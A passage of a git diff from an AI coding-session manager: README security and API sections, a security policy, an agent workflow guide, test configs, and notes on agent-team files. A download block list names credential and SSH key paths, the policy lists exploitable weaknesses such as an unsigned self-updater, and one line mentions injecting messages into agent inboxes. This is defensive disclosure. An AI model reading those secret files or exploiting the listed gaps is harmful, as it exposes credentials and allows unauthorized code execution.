- **跨站 Origin / CSRF 防护。** 对变更状态的方法(`POST`/`PUT`/`PATCH`/`DELETE`),`Origin` 必须通过同一允许列表,否则返回 `403 cross-site request blocked`。*缺失*的 Origin 被允许(因此 `curl`、CLI 与 Claude Code hook 仍可工作);只有存在但外来、或不透明的 `null` origin 才会被拒绝
|
||||
- **原始 `text/plain` 请求体。** 全局解析器不再对 `text/plain` 做 JSON 解析,封堵了那个跨站 `fetch` 能在无预检的情况下把 JSON 走私进写路由的 CORS「简单请求」CSRF 向量
|
||||
- **WebSocket Origin 校验。** 终端 WS 升级运行同样的 Host + Origin 检查,失败时以代码 `4003` 关闭(反 CSWSH)
|
||||
- **XSS 转义的智能体输出。** AI 衍生的字符串(工具名、命令参数、子智能体描述)在渲染进子智能体 / 活动面板前,于每个注入点都做 HTML 转义
|
||||
|
||||
### 输入、文件与响应头
|
||||
|
||||
- **模式校验的输入** —— 每个 API 请求体都用 Zod v4 模式检查;一个 `CLAUDE_CODE_*` / `OPENCODE_*` / `CODEX_*` 环境变量前缀允许列表把控每个 CLI 能接收哪些设置
|
||||
- **路径限定** —— 文件路由在边界检查前先 `realpath`(无 TOCTOU);`..`、绝对路径、以及解析到工作目录之外的符号链接都会被拒绝。上限:10 MB 文本预览 / 50 MB 原始与下载;`/api/download` 对敏感路径(`.env`、`*credentials*`、`~/.ssh/`、`.aws/credentials`)做黑名单。SVG/HTML 以 `octet-stream` + `nosniff` + attachment 提供,因此会被下载而非执行
|
||||
- **安全响应头** —— `Content-Security-Policy`(`default-src 'self'`,每个例外都逐条列举)、`X-Content-Type-Options: nosniff`、`X-Frame-Options: SAMEORIGIN`、HTTPS 下的 HSTS,以及**仅**对 `localhost` / `127.0.0.1` / `::1` 反射的 CORS
|
||||
|
||||
### 供应链与隔离
|
||||
|
||||
- **锁定并校验的依赖** —— 安全敏感的传递依赖通过 npm `overrides` 强制为已打补丁版本;每次提交/PR 都检查锁文件完整性(所有条目都解析到 `registry.npmjs.org` 且带 `sha512` 哈希)。公共资源在 CI 中做 NUL 字节扫描与 `node --check` 校验
|
||||
- **多实例隔离** —— `CODEMAN_INSTANCE` 同时限定 tmux 套接字(`-L codeman-<name>`)与数据目录(`~/.codeman-<name>`),因此两个实例绝不会互相附着对方的活动会话
|
||||
|
||||
> 移动端登录使用一次性、60 秒二维码令牌 —— 完整设计见上文[二维码认证](#二维码认证)(它应对了 USENIX Security 2025 二维码登录研究中的全部 6 个缺陷)。
|
||||
|
||||
---
|
||||
|
||||
## SSH 替代方案(`sc`)
|
||||
|
||||
如果你更喜欢 SSH(Termius、Blink 等),`sc` 命令是一个便于拇指操作的会话选择器:
|
||||
|
||||
```bash
|
||||
sc # 交互式选择器
|
||||
sc 2 # 快速附着到会话 2
|
||||
sc -l # 列出会话
|
||||
```
|
||||
|
||||
单数字选择(1–9)、颜色编码的状态、token 计数、自动刷新。用 `Ctrl+A D` 分离。
|
||||
|
||||
---
|
||||
|
||||
## 键盘快捷键
|
||||
|
||||
> Ctrl 绑定在 macOS 上也接受 Cmd。
|
||||
|
||||
| 快捷键 | 动作 |
|
||||
|----------|--------|
|
||||
| `Ctrl/Cmd+W` | 杀掉当前会话 |
|
||||
| `Ctrl/Cmd+Tab` | 下一个会话 |
|
||||
| `Alt+1`–`Alt+9` | 切换到第 N 个标签 |
|
||||
| `Ctrl+Shift+{` / `Ctrl+Shift+}` | 将当前标签左移 / 右移 |
|
||||
| `Ctrl/Cmd+L` | 清屏 |
|
||||
| `Ctrl+Shift+R` | 恢复终端尺寸 |
|
||||
| `Ctrl+Shift+V` | 切换语音输入 |
|
||||
| `Ctrl/Cmd +` / `-` | 字体大小 |
|
||||
| `Ctrl/Cmd+?` | 键盘帮助 |
|
||||
| `Shift+Enter` | 插入换行(发送到终端) |
|
||||
| `Escape` | 关闭面板与模态框 |
|
||||
|
||||
---
|
||||
|
||||
## API
|
||||
|
||||
基于 Fastify 的 REST —— **15 个路由模块中约 140 个处理器**,外加一条 SSE 流和一条 WebSocket 终端通道。以下是一个有代表性的子集:
|
||||
|
||||
### 会话(Sessions)
|
||||
| 方法 | 端点 | 说明 |
|
||||
|--------|----------|-------------|
|
||||
| `GET` | `/api/sessions` | 列出全部 |
|
||||
| `POST` | `/api/quick-start` | 创建 case 并启动会话 |
|
||||
| `DELETE` | `/api/sessions/:id` | 删除会话 |
|
||||
| `POST` | `/api/sessions/:id/input` | 发送输入 |
|
||||
|
||||
### 重生(Respawn)
|
||||
| 方法 | 端点 | 说明 |
|
||||
|--------|----------|-------------|
|
||||
| `POST` | `/api/sessions/:id/respawn/enable` | 启用,带配置与定时器 |
|
||||
| `POST` | `/api/sessions/:id/respawn/stop` | 停止控制器 |
|
||||
| `PUT` | `/api/sessions/:id/respawn/config` | 更新配置 |
|
||||
|
||||
### Ralph / Todo
|
||||
| 方法 | 端点 | 说明 |
|
||||
|--------|----------|-------------|
|
||||
| `GET` | `/api/sessions/:id/ralph-state` | 获取循环状态 + todos |
|
||||
| `POST` | `/api/sessions/:id/ralph-config` | 配置跟踪 |
|
||||
|
||||
### 编排器(Orchestrator)
|
||||
| 方法 | 端点 | 说明 |
|
||||
|--------|----------|-------------|
|
||||
| `POST` | `/api/orchestrator/start` | 从目标启动编排 |
|
||||
| `POST` | `/api/orchestrator/approve` | 批准生成的计划 |
|
||||
| `GET` | `/api/orchestrator/status` | 当前阶段 + 进度 |
|
||||
| `POST` | `/api/orchestrator/stop` | 停止并清理 |
|
||||
|
||||
### 子智能体(Subagents)
|
||||
| 方法 | 端点 | 说明 |
|
||||
|--------|----------|-------------|
|
||||
| `GET` | `/api/subagents` | 列出所有后台智能体 |
|
||||
| `GET` | `/api/subagents/:id` | 智能体信息与状态 |
|
||||
| `GET` | `/api/subagents/:id/transcript` | 完整活动记录 |
|
||||
| `DELETE` | `/api/subagents/:id` | 杀掉智能体进程 |
|
||||
|
||||
### 系统(System)
|
||||
| 方法 | 端点 | 说明 |
|
||||
|--------|----------|-------------|
|
||||
| `GET` | `/api/events` | SSE 流 |
|
||||
| `GET` | `/api/status` | 完整应用状态 |
|
||||
| `POST` | `/api/hook-event` | Hook 回调 |
|
||||
| `GET` | `/api/system/update/check` | 检查新发行版 |
|
||||
| `POST` | `/api/system/update` | 自更新(git-clone 安装) |
|
||||
| `POST` | `/api/clipboard` | 把文本推送到所有已连接浏览器(`{text}`) |
|
||||
| `GET` | `/api/sessions/:id/run-summary` | 时间线 + 统计 |
|
||||
|
||||
---
|
||||
|
||||
## 架构
|
||||
|
||||
```mermaid
|
||||
flowchart TB
|
||||
subgraph Codeman["CODEMAN"]
|
||||
subgraph Frontend["前端层"]
|
||||
UI["Web UI<br/><small>xterm.js + 智能体窗口</small>"]
|
||||
API["REST API<br/><small>Fastify</small>"]
|
||||
SSE["SSE 事件<br/><small>/api/events</small>"]
|
||||
end
|
||||
|
||||
subgraph Core["核心层"]
|
||||
SM["会话管理器"]
|
||||
S1["会话 (PTY)"]
|
||||
S2["会话 (PTY)"]
|
||||
RC["重生控制器"]
|
||||
ORC["编排器循环"]
|
||||
end
|
||||
|
||||
subgraph Detection["检测层"]
|
||||
RT["Ralph 跟踪器"]
|
||||
SW["子智能体监视器<br/><small>~/.claude/projects/*/subagents</small>"]
|
||||
TW["团队监视器<br/><small>~/.claude/teams/*</small>"]
|
||||
end
|
||||
|
||||
subgraph Persistence["持久化层"]
|
||||
SCR["Mux 管理器<br/><small>(tmux)</small>"]
|
||||
SS["状态存储<br/><small>state.json</small>"]
|
||||
end
|
||||
|
||||
subgraph External["外部"]
|
||||
CLI["AI CLI<br/><small>Claude Code / OpenCode / Codex</small>"]
|
||||
BG["后台智能体<br/><small>(Task 工具)</small>"]
|
||||
end
|
||||
end
|
||||
|
||||
UI <--> API
|
||||
API <--> SSE
|
||||
API --> SM
|
||||
SM --> S1
|
||||
SM --> S2
|
||||
SM --> RC
|
||||
SM --> ORC
|
||||
SM --> SS
|
||||
S1 --> RT
|
||||
S1 --> SCR
|
||||
S2 --> SCR
|
||||
RC --> SCR
|
||||
ORC --> SCR
|
||||
SCR --> CLI
|
||||
SW --> BG
|
||||
SW --> SSE
|
||||
TW --> SSE
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## 开发
|
||||
|
||||
```bash
|
||||
npm install
|
||||
npx tsx src/index.ts web # 开发模式
|
||||
npm run build # 生产构建
|
||||
npm test # 运行测试
|
||||
```
|
||||
|
||||
完整文档见 [CLAUDE.md](./CLAUDE.md)。
|
||||
|
||||
---
|
||||
|
||||
## 代码库质量
|
||||
|
||||
本代码库经历了一次全面的 7 阶段重构,消除了上帝对象、集中了配置,并建立了模块化架构:
|
||||
|
||||
| 阶段 | 改了什么 | 影响 |
|
||||
|-------|-------------|--------|
|
||||
| **性能** | 缓存端点、SSE 自适应批处理、缓冲区分块 | 终端延迟低于 16ms |
|
||||
| **路由抽取** | `server.ts` 拆分为 15 个领域路由模块 + 认证中间件 + 端口接口 | server.ts 代码量 **−67%**(6,736 → 2,254) |
|
||||
| **领域拆分** | `types.ts` → 16 个领域文件、`ralph-tracker` → 7 个文件、`respawn-controller` → 5 个文件、`session` → 6 个文件 | 不再有上帝文件 |
|
||||
| **前端模块** | `app.js` → 18 个抽取模块,横跨基础设施、领域与特性层 | app.js 核心降至 **约 3.4K 行** |
|
||||
| **配置合并** | 约 70 个散落的魔法数字 → 10 个领域聚焦的配置文件 | 零跨文件重复 |
|
||||
| **测试基础设施** | 共享 mock 库、12 个路由测试文件、统一的 MockSession | 路由处理器可通过 `app.inject()` 测试 |
|
||||
|
||||
完整细节:[`docs/archive/code-structure-findings.md`](docs/archive/code-structure-findings.md)
|
||||
|
||||
---
|
||||
|
||||
## 已发布的包
|
||||
|
||||
### [`xterm-zerolag-input`](https://www.npmjs.com/package/xterm-zerolag-input)
|
||||
|
||||
[](https://www.npmjs.com/package/xterm-zerolag-input)
|
||||
|
||||
为 xterm.js 提供即时按键反馈的叠加层。通过把输入的字符立即渲染为像素级精准的 DOM 叠加层,消除高 RTT 连接下的感知输入延迟。零依赖、可配置的提示符检测、带 78 个测试的完整状态机。
|
||||
|
||||
```bash
|
||||
npm install xterm-zerolag-input
|
||||
```
|
||||
|
||||
[完整文档](packages/xterm-zerolag-input/README.md)
|
||||
|
||||
---
|
||||
|
||||
## 许可证
|
||||
|
||||
MIT —— 见 [LICENSE](LICENSE)
|
||||
|
||||
---
|
||||
|
||||
<p align="center">
|
||||
<strong>跟踪会话。可视化智能体。掌控重生。让它在你睡觉时持续运行。</strong>
|
||||
</p>
|
||||
@@ -1,78 +0,0 @@
|
||||
# Security Policy
|
||||
|
||||
Codeman launches AI coding sessions with `--dangerously-skip-permissions`, so the
|
||||
web UI is **by design a remote-code-execution surface for whoever can reach it**.
|
||||
The entire security model exists to control *who* that is. Please read this before
|
||||
exposing an instance beyond `localhost`. The full model lives in
|
||||
[`docs/security-architecture.md`](docs/security-architecture.md).
|
||||
|
||||
## Supported versions
|
||||
|
||||
Security fixes land on the latest published `codeman@X.Y.Z` release and `master`.
|
||||
Older versions are not patched — upgrade to the latest release (App Settings →
|
||||
Updates for git-clone installs, or `npm i -g aicodeman@latest`).
|
||||
|
||||
| Version | Supported |
|
||||
| ------- | --------- |
|
||||
| latest `0.9.x` / `master` | ✅ |
|
||||
| anything older | ❌ (upgrade) |
|
||||
|
||||
## Reporting a vulnerability
|
||||
|
||||
**Please do not open a public issue for security problems.**
|
||||
|
||||
Report privately via **GitHub's private vulnerability reporting**:
|
||||
the repository's **Security** tab → **Report a vulnerability**
|
||||
(<https://github.com/Ark0N/Codeman/security/advisories/new>). This opens a private
|
||||
advisory thread with the maintainer.
|
||||
|
||||
> Maintainer note: enable *Settings → Code security and analysis → Private
|
||||
> vulnerability reporting* so this channel is live.
|
||||
|
||||
When reporting, please include: affected version/commit, the deployment shape
|
||||
(loopback-only, `CODEMAN_PASSWORD` set, tunnel/`tailscale serve`, custom
|
||||
reverse proxy), reproduction steps, and impact. We aim to acknowledge within a
|
||||
few days. Coordinated disclosure is appreciated — we'll agree a disclosure
|
||||
timeline with you once impact is confirmed.
|
||||
|
||||
### In scope
|
||||
- Authentication / session-cookie bypass when `CODEMAN_PASSWORD` is set
|
||||
- DNS-rebinding, CSRF/CSWSH, or Origin/Host-guard bypass reaching state-changing routes
|
||||
- Remote code execution reachable **without** local OS access (e.g. via a browser, a tunnel, or a foreign origin)
|
||||
- Path traversal / arbitrary file read or write through the HTTP API
|
||||
- Supply-chain integrity of the in-app self-updater
|
||||
|
||||
### Out of scope (by design — see Known limitations)
|
||||
- Anything requiring an already-trusted **same-machine, same-uid** process. Codeman trusts the local OS user it runs as; a peer process of that user is already inside the boundary.
|
||||
- Running an authless instance bound to a non-loopback host after dismissing the startup warning (you explicitly acknowledged it).
|
||||
- The default loopback + no-password posture itself (it is reachable only from the same machine).
|
||||
|
||||
## Trust model (summary)
|
||||
|
||||
- **Loopback by default.** Binds `127.0.0.1`; the no-password default is safe out of the box. Binding a non-loopback host without `CODEMAN_PASSWORD` *starts but prints a loud warning* with concrete fixes.
|
||||
- **Always-on Host + Origin guards.** Block DNS-rebinding and cross-site state-changing requests even on the no-auth loopback install (a missing Origin is allowed so CLI/hooks work).
|
||||
- **Optional auth.** HTTP Basic via `CODEMAN_USERNAME`/`CODEMAN_PASSWORD`; success issues an opaque server-side 256-bit cookie. Per-IP rate limiting on failures.
|
||||
- **Hardened file serving, tmux launch, transport headers, and multi-instance isolation** — see the full architecture doc.
|
||||
|
||||
## Known limitations and accepted risk
|
||||
|
||||
A 1.0 release is an implicit statement that the documented model *is* the model, so
|
||||
these residuals are stated explicitly. Most sit **inside the same-uid OS trust
|
||||
boundary** or behind the always-on Origin guard; they matter mainly for
|
||||
shared-host, multi-user, or tunneled deployments.
|
||||
|
||||
- **Self-update trusts an unsigned release tag.** The in-app updater does `git checkout <tag> && npm install` (lifecycle scripts run) of a tag matched only by name shape, from whatever `origin` points to — no signature/commit verification. Treat the updater as trusting your `origin` remote and your release pipeline. (Hardening tracked for 1.0.)
|
||||
- **CSP ships `'unsafe-inline'`.** Inline handlers mean the Content-Security-Policy is defense-in-depth only; all AI-/file-derived sinks are escaped, but a future missed escape would be executable.
|
||||
- **`workingDir` is unconstrained.** A session may be created with any absolute working directory (e.g. `/`), which becomes the file-route boundary for that session. Scope it to trusted paths on shared hosts.
|
||||
- **Hook-event auth exemption is loopback-IP-based.** `POST /api/hook-event` is exempt from auth for loopback callers; because tunnels (cloudflared / `tailscale serve`) terminate at `127.0.0.1`, a loopback-terminating tunnel inherits the exemption. Set `CODEMAN_PASSWORD` and prefer a tunnel that preserves the client identity if this matters.
|
||||
- **Session cookie is not bound to client IP/UA on reuse, and refreshes without an absolute cap.** A stolen cookie replays until its idle TTL elapses.
|
||||
- **Multi-instance tmux socket is process-wide.** Two Codeman instances on the same `CODEMAN_INSTANCE` share a tmux socket and can attach each other's live sessions — isolate with distinct `CODEMAN_INSTANCE` values.
|
||||
- **The live log-tail route reads `/var/log` and `~/logs`** in addition to the session working directory (read-only) — a deliberate choice for tailing system/app logs. On a password-protected remote deployment an authenticated user can therefore read those roots outside their session. See `docs/security-architecture.md` §5.
|
||||
|
||||
Recent hardening (this release): web-push subscription endpoints are restricted
|
||||
to https public hosts (SSRF guard — rejects internal/metadata IPs, validated at
|
||||
subscribe and send time), and tmux session names discovered on the shared socket
|
||||
are validated against the safe-name pattern before reaching any shell call site.
|
||||
|
||||
For the detailed rationale, defenses, and recommended secure setups, see
|
||||
[`docs/security-architecture.md`](docs/security-architecture.md).
|
||||
@@ -1,104 +0,0 @@
|
||||
# SPEEDRUN.md — Fast-execution protocol for Claude
|
||||
|
||||
Read this when the goal is **throughput**: get correct, verified work done with
|
||||
minimum ceremony. This does **not** relax correctness or the safety rules in
|
||||
`CLAUDE.md` — those still win. It removes _waste_, not _rigor_.
|
||||
|
||||
> Precedence: `CLAUDE.md` > explicit user instructions > this file. If anything
|
||||
> here conflicts with `CLAUDE.md`, `CLAUDE.md` wins.
|
||||
|
||||
---
|
||||
|
||||
## The mindset
|
||||
|
||||
- **Act, don't announce.** No "I'm going to now…" preamble. Do the thing, report
|
||||
the result.
|
||||
- **Cheapest proof that the change works.** Pick the smallest check that actually
|
||||
demonstrates correctness — not the biggest.
|
||||
- **Batch aggressively.** Independent reads, greps, and edits go in **one**
|
||||
message with parallel tool calls. Never serialize work that has no dependency.
|
||||
- **Momentum over perfection.** Land a correct increment, verify it, move on.
|
||||
Don't gold-plate untouched code.
|
||||
|
||||
---
|
||||
|
||||
## Loop (repeat until done)
|
||||
|
||||
1. **Orient once** — one parallel burst of reads/greps to load the context you
|
||||
need. Don't re-read files the harness says are already current.
|
||||
2. **Change** — make the edit(s). Batch independent edits.
|
||||
3. **Verify cheaply** — the smallest check that proves _this_ change (see below).
|
||||
4. **Advance** — next item. Only re-verify what you touched.
|
||||
5. **Stop** at: list empty, a hard blocker, or a decision that's genuinely the
|
||||
user's to make.
|
||||
|
||||
---
|
||||
|
||||
## Verification ladder — climb only as high as the change needs
|
||||
|
||||
| Change kind | Cheapest sufficient check |
|
||||
|-------------|---------------------------|
|
||||
| Types / signatures / imports | `tsc --noEmit` (or `--watch` already running) |
|
||||
| One module's logic | `npm test -- test/<file>.test.ts` (the **one** relevant file) |
|
||||
| A named behavior | `npm test -- -t "pattern"` |
|
||||
| Route/handler | `app.inject()` route test, or one `curl` against the running dev server |
|
||||
| Frontend render | Playwright load + assert (`waitUntil: 'domcontentloaded'`, wait 3–4s) |
|
||||
| Broad / pre-merge | `npm run test:ci` (the CI-equivalent sweep) |
|
||||
|
||||
**Hard rules (never skip, even in a rush):**
|
||||
- ⚠️ **Never run bare `npm test`** — it pulls in browser/visual suites that hang
|
||||
or fail locally. Always pass a file or `-t`, or use `test:ci`.
|
||||
- ⚠️ **Never COM without verifying the change actually works** first (curl the
|
||||
endpoint / Playwright the UI). "Compiles" ≠ "works".
|
||||
- ⚠️ **Session safety** — check `$CODEMAN_MUX`; never `tmux kill-session` /
|
||||
`pkill claude` in a managed session.
|
||||
- ⚠️ **Single-line prompts** for any programmatic session input.
|
||||
|
||||
---
|
||||
|
||||
## Speed tactics that pay off here
|
||||
|
||||
- **Parallel exploration**: dispatch `Explore` subagents (or one parallel grep
|
||||
burst) instead of serial file-by-file reading when scope is uncertain.
|
||||
- **`tsc --noEmit --watch`** in the background — instant type feedback, no repeat
|
||||
cold starts.
|
||||
- **Target one test file** — `fileParallelism: false` means the suite is serial;
|
||||
running one file is dramatically faster than the sweep.
|
||||
- **`curl localhost:3000/api/...`** beats spinning up a browser for backend
|
||||
checks. Reserve Playwright for actual UI rendering.
|
||||
- **Trust the harness** — if it says a file you just edited is current, don't
|
||||
re-Read it to "confirm". The Edit already succeeded or it would have errored.
|
||||
|
||||
---
|
||||
|
||||
## Anti-patterns (these masquerade as speed, but cost time)
|
||||
|
||||
- Running the full test suite to check a one-file change.
|
||||
- Re-reading files you already have in context.
|
||||
- Narrating a plan you're about to execute anyway.
|
||||
- Serial tool calls that have no dependency between them.
|
||||
- Claiming "done / fixed / passing" **before** running the check that proves it.
|
||||
- Deploying (COM) on green typecheck alone, without exercising the real flow.
|
||||
|
||||
---
|
||||
|
||||
## Stop-conditions (don't rush past these)
|
||||
|
||||
Stop and surface, don't guess, when you hit:
|
||||
- A **destructive / hard-to-reverse** action (delete, overwrite, force-push).
|
||||
- An **outward-facing** action (publishing, sending, deploying) not already
|
||||
authorized.
|
||||
- A **genuine product decision** the code can't answer.
|
||||
- A **failing verification you can't explain** — debug it (see
|
||||
`superpowers:systematic-debugging`), don't paper over it.
|
||||
|
||||
---
|
||||
|
||||
## Definition of done
|
||||
|
||||
A task is done when **all** hold:
|
||||
- The change is made.
|
||||
- The cheapest sufficient check **ran** and **passed** — evidence, not assertion.
|
||||
- No new type errors / lint errors introduced (`tsc --noEmit`, `npm run lint`).
|
||||
- You state plainly what was done and what proved it. If a step was skipped or a
|
||||
test failed, say so — don't hedge, don't overclaim.
|
||||
@@ -1,28 +0,0 @@
|
||||
// @ts-check
|
||||
import eslint from '@eslint/js';
|
||||
import tseslint from 'typescript-eslint';
|
||||
|
||||
export default tseslint.config(
|
||||
eslint.configs.recommended,
|
||||
tseslint.configs.recommended,
|
||||
{
|
||||
rules: {
|
||||
'no-console': 'off',
|
||||
'no-debugger': 'error',
|
||||
// Relax some rules that conflict with existing patterns
|
||||
'@typescript-eslint/no-explicit-any': 'warn',
|
||||
'@typescript-eslint/no-unused-vars': 'off', // TypeScript compiler already handles this
|
||||
},
|
||||
},
|
||||
{
|
||||
ignores: [
|
||||
'dist/**',
|
||||
'node_modules/**',
|
||||
'coverage/**',
|
||||
'src/web/public/vendor/**',
|
||||
'src/web/public/app.js',
|
||||
'scripts/**/*.mjs',
|
||||
'scripts/remotion/**',
|
||||
],
|
||||
}
|
||||
);
|
||||
@@ -1,33 +0,0 @@
|
||||
import { resolve } from 'node:path';
|
||||
import { defineConfig, configDefaults } from 'vitest/config';
|
||||
|
||||
const root = resolve(import.meta.dirname, '..');
|
||||
|
||||
/**
|
||||
* CI test config — same as vitest.config.ts but EXCLUDES the browser-driven
|
||||
* mobile suite (test/mobile/**). Those are Playwright visual-regression tests
|
||||
* that need a live server + chromium + environment-specific PNG baselines, so
|
||||
* they are run/maintained separately and are not part of the CI gate.
|
||||
*
|
||||
* Keep the rest in sync with config/vitest.config.ts.
|
||||
*/
|
||||
export default defineConfig({
|
||||
test: {
|
||||
root,
|
||||
globals: true,
|
||||
environment: 'node',
|
||||
include: ['test/**/*.test.ts'],
|
||||
exclude: [
|
||||
...configDefaults.exclude,
|
||||
'test/mobile/**', // browser/visual (Playwright + chromium)
|
||||
'test/perf-*.test.ts', // timing-sensitive perf benchmarks (flaky in CI)
|
||||
'test/inline-rename.test.ts', // browser (Playwright)
|
||||
'test/opencode-resize.test.ts', // browser (Playwright)
|
||||
'test/webgl-fallback.test.ts', // browser (Playwright)
|
||||
],
|
||||
setupFiles: ['./test/setup.ts'],
|
||||
fileParallelism: false,
|
||||
testTimeout: 30000,
|
||||
teardownTimeout: 60000,
|
||||
},
|
||||
});
|
||||
@@ -1,26 +0,0 @@
|
||||
import { resolve } from 'node:path';
|
||||
import { defineConfig } from 'vitest/config';
|
||||
|
||||
const root = resolve(import.meta.dirname, '..');
|
||||
|
||||
export default defineConfig({
|
||||
test: {
|
||||
root,
|
||||
globals: true,
|
||||
environment: 'node',
|
||||
include: ['test/**/*.test.ts'],
|
||||
setupFiles: ['./test/setup.ts'],
|
||||
// Run test files sequentially to respect mux session limits
|
||||
// Individual tests within files still run in parallel where safe
|
||||
fileParallelism: false,
|
||||
coverage: {
|
||||
provider: 'v8',
|
||||
reporter: ['text', 'json', 'html'],
|
||||
include: ['src/**/*.ts'],
|
||||
exclude: ['src/index.ts', 'src/cli.ts'],
|
||||
},
|
||||
testTimeout: 30000, // 30 seconds for integration tests
|
||||
// Ensure cleanup runs even on test failures
|
||||
teardownTimeout: 60000,
|
||||
},
|
||||
});
|
||||
@@ -1,244 +0,0 @@
|
||||
# Claude Code Agent Teams — Reference
|
||||
|
||||
> Experimental feature (Feb 2026). Enable per-session via env var.
|
||||
> Updated with experiment findings from 2026-02-12.
|
||||
|
||||
## Enabling
|
||||
|
||||
```bash
|
||||
# Environment variable (set before starting Claude Code)
|
||||
CLAUDE_CODE_EXPERIMENTAL_AGENT_TEAMS=1
|
||||
|
||||
# In .claude/settings.local.json (case-scoped)
|
||||
{
|
||||
"env": {
|
||||
"CLAUDE_CODE_EXPERIMENTAL_AGENT_TEAMS": "1"
|
||||
}
|
||||
}
|
||||
# Note: "teammateMode" is NOT a valid settings key (validation rejects it).
|
||||
# Display mode defaults to "in-process". For tmux, pass --teammate-mode flag via CLI.
|
||||
```
|
||||
|
||||
## Filesystem Paths (Verified)
|
||||
|
||||
| Resource | Path |
|
||||
|----------|------|
|
||||
| Team config | `~/.claude/teams/{team-name}/config.json` |
|
||||
| Teammate inboxes | `~/.claude/teams/{team-name}/inboxes/{name}.json` |
|
||||
| Shared tasks | `~/.claude/tasks/{team-name}/` |
|
||||
| Teammate transcripts | `~/.claude/projects/{hash}/{leadSessionId}/subagents/agent-{id}.jsonl` |
|
||||
|
||||
Note: Teammate transcripts appear in the **standard subagent directory** under the lead's session, NOT as separate top-level sessions.
|
||||
|
||||
### config.json format (verified)
|
||||
|
||||
```json
|
||||
{
|
||||
"name": "research-watchers",
|
||||
"description": "Team description...",
|
||||
"createdAt": 1770875105373,
|
||||
"leadAgentId": "team-lead@research-watchers",
|
||||
"leadSessionId": "461daa80-94ec-4e5e-a1bb-0518f78311bc",
|
||||
"members": [
|
||||
{
|
||||
"agentId": "team-lead@research-watchers",
|
||||
"name": "team-lead",
|
||||
"agentType": "team-lead",
|
||||
"model": "claude-opus-4-6",
|
||||
"joinedAt": 1770875105373,
|
||||
"tmuxPaneId": "",
|
||||
"cwd": "/path/to/project",
|
||||
"subscriptions": []
|
||||
},
|
||||
{
|
||||
"agentId": "fs-researcher@research-watchers",
|
||||
"name": "fs-researcher",
|
||||
"agentType": "general-purpose",
|
||||
"model": "claude-opus-4-6",
|
||||
"prompt": "Full spawn prompt...",
|
||||
"color": "blue",
|
||||
"planModeRequired": false,
|
||||
"joinedAt": 1770875126680,
|
||||
"tmuxPaneId": "in-process",
|
||||
"cwd": "/path/to/project",
|
||||
"subscriptions": [],
|
||||
"backendType": "in-process"
|
||||
}
|
||||
]
|
||||
}
|
||||
```
|
||||
|
||||
Key fields: `agentId` format is `{name}@{teamName}`, `leadSessionId` links to Codeman session, `backendType` indicates display mode, `color` for UI theming.
|
||||
|
||||
### Task file format (verified)
|
||||
|
||||
```json
|
||||
{
|
||||
"id": "1",
|
||||
"subject": "Research Node.js fs.watch on Linux vs macOS",
|
||||
"description": "Full description...",
|
||||
"activeForm": "Researching Node.js fs.watch Linux vs macOS",
|
||||
"status": "in_progress",
|
||||
"blocks": [],
|
||||
"blockedBy": [],
|
||||
"owner": "fs-researcher"
|
||||
}
|
||||
```
|
||||
|
||||
Internal teammate tracking tasks have `"metadata": { "_internal": true }`.
|
||||
|
||||
Task states: `pending` → `in_progress` → `completed`. File locking via `.lock.lock` directory (mkdir-based atomic lock).
|
||||
|
||||
### Inbox message format (verified)
|
||||
|
||||
```json
|
||||
[
|
||||
{
|
||||
"from": "team-lead",
|
||||
"text": "{\"type\":\"task_assignment\",\"taskId\":\"1\",\"subject\":\"...\",\"assignedBy\":\"team-lead\",\"timestamp\":\"...\"}",
|
||||
"timestamp": "2026-02-12T05:45:18.176Z",
|
||||
"read": false
|
||||
}
|
||||
]
|
||||
```
|
||||
|
||||
`text` is double-encoded JSON. Message types: `task_assignment`, `shutdown_request`, `shutdown_response`. File locking via `.json.lock` directory.
|
||||
|
||||
## Communication Model (CORRECTED)
|
||||
|
||||
**Hybrid: tool + filesystem.** The `SendMessage` tool writes to filesystem inbox files at `~/.claude/teams/{name}/inboxes/{teammate}.json`.
|
||||
|
||||
Each teammate AND the lead has an inbox JSON file. Messages are JSON arrays with `from`, `text` (double-encoded JSON), `timestamp`, `read` fields.
|
||||
|
||||
Message types observed:
|
||||
- **task_assignment**: Lead assigns task to teammate
|
||||
- **shutdown_request**: Lead asks teammate to shut down
|
||||
- **shutdown_response**: Teammate confirms shutdown
|
||||
- (Also: `message`, `broadcast`, `plan_approval_response` per docs)
|
||||
|
||||
**Implication:** We can intercept messages by watching inbox files AND potentially inject messages by writing to them (respecting `.json.lock` directory locking).
|
||||
|
||||
## Process Model (CORRECTED)
|
||||
|
||||
**Teammates are IN-PROCESS THREADS, not separate OS processes.**
|
||||
|
||||
In `in-process` mode (the default), all teammates run as threads within the single `claude` process. Only 1 claude process exists per Codeman session, regardless of team size.
|
||||
|
||||
This means:
|
||||
- No separate PIDs to track per teammate
|
||||
- All teammates share the lead's environment variables
|
||||
- Lower resource overhead than separate processes
|
||||
- Subagent transcript files still created (for progress tracking)
|
||||
|
||||
## Display Modes
|
||||
|
||||
| Mode | Trigger | UI | Requirement |
|
||||
|------|---------|-----|------------|
|
||||
| **in-process** (default) | Default | Shift+Up/Down to switch, Ctrl+T for tasks | Any terminal |
|
||||
| **tmux** | `--teammate-mode tmux` | Split panes | tmux installed |
|
||||
| **iTerm2** | Auto-detected | Native split panes | iTerm2 + `it2` CLI |
|
||||
|
||||
**For Codeman: use `in-process` only.** Codeman manages its own tmux sessions externally.
|
||||
|
||||
**In-process UI elements:**
|
||||
- Status bar: `@main @teammate1 @teammate2 ...` with `shift+↑ to expand`
|
||||
- Task list: Checkboxes with assignments `(@teammate-name)`
|
||||
- Hint: `ctrl+t to show teammates`
|
||||
|
||||
## Hooks
|
||||
|
||||
Two new hook types for quality gates (verified in settings schema):
|
||||
|
||||
### TeammateIdle
|
||||
Fires when a teammate is about to go idle.
|
||||
- Exit code 0: Allow idle (normal)
|
||||
- Exit code 2: Send feedback back, keep teammate working
|
||||
|
||||
### TaskCompleted
|
||||
Fires when a task is being marked complete.
|
||||
- Exit code 0: Allow completion
|
||||
- Exit code 2: Prevent completion, send feedback
|
||||
|
||||
These are configured in `.claude/settings.local.json` alongside existing Codeman hooks.
|
||||
|
||||
## Subagent-Watcher Compatibility (Verified)
|
||||
|
||||
**Teammates appear as standard subagents.** They create transcript files at:
|
||||
```
|
||||
~/.claude/projects/{hash}/{leadSessionId}/subagents/agent-{id}.jsonl
|
||||
```
|
||||
|
||||
Codeman's existing `subagent-watcher.ts` discovers them automatically. They appear in `/api/subagents` with status "active".
|
||||
|
||||
**Distinguishing teammates from regular subagents:**
|
||||
- Description field starts with `<teammate-message teammate_id= team`
|
||||
